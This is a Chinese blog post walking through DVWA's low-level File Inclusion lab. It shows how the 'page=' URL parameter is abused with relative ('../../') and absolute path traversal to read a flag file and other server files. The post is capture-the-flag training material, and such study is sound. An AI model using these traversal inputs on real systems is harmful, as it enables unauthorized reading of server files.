File Inclusion(文件包含)-DVWA
2023-11-10
| 2024-4-21
0  |  阅读时长 0 分钟
type
status
date
slug
summary
tags
category
icon
password
@ZZHow(ZZHow1024)

一、Low 级(基本没有做防护或者只是最简单的防护)

含义:编写的代码“引用”其他文件的代码!

思路:利用“引用”打开正常看不见的文件

实操:

1.先随便试试

  • 点击 [file1.php] 接着点击 [file2.php] 再点击 [file3.php]
  • 观察URL的变化。
    • http://xxx.xxx.xxx.xxx:8000/vulnerabilities/fi/?page=file1.php
    • http://xxx.xxx.xxx.xxx:8000/vulnerabilities/fi/?page=file2.php
    • http://xxx.xxx.xxx.xxx:8000/vulnerabilities/fi/?page=file3.php

2.分析URL和Source

  • URL:最后的page= 的内容在变化。
  • Source:
  • 证明三次分别引用了file1.phpfile2.phpfile3.php
  • 可以通过file=后的参数打开文件。

3.利用file=后的参数打开flag

  • ../../hackable/flags/fi.php(相对路径)填入page=后
    • http://xxx.xxx.xxx.xxx:8000/vulnerabilities/fi/?page=../../hackable/flags/fi.php
  • 按下Enter。
notion image

打开成功!

 
其他示例:
  • /var/www/html/hackable/flags/fi.php(绝对路径)填入page=后
    • http://xxx.xxx.xxx.xxx:8000/vulnerabilities/fi/?page=/var/www/html/hackable/flags/fi.php
  • 按下Enter。
  • 再换其他文件试试

都能打开成功!

  • CTF
  • DVWA靶场
  • CSRF(Cross-site request forgery) • 跨站点请求伪造-DVWAFile Upload(文件上传)-DVWA
    Loading...
    目录